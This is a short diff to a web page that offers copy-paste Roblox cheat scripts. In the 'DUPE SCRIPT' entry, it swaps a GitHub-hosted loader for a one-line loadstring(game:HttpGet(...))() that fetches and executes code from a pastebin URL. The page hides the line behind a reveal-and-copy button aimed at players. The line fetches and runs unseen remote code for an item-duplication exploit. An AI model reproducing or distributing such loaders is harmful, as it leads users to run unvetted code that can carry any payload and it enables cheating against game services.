--- a/index.html
+++ b/index.html
@@ -497,7 +497,7 @@
 
             <div class="script-item">
                 <div class="script-title">7. DUPE SCRIPT</div>
-                <div class="code-box blurred" id="script7" onclick="revealScript(this)">loadstring(game:HttpGet("https://raw.githubusercontent.com/BrainrotDupeScript/SAB-DupeScript/refs/heads/main/DupeBrainrots"))()</div>
+                <div class="code-box blurred" id="script7" onclick="revealScript(this)">loadstring(game:HttpGet('https://pastebin.com/raw/kPSzLBf4',true))()</div>
                 <button class="copy-btn" onclick="copyToClipboard('script7', this)" disabled="">COPY TO CLIPBOARD (REVEAL FIRST)</button>
             </div>
 
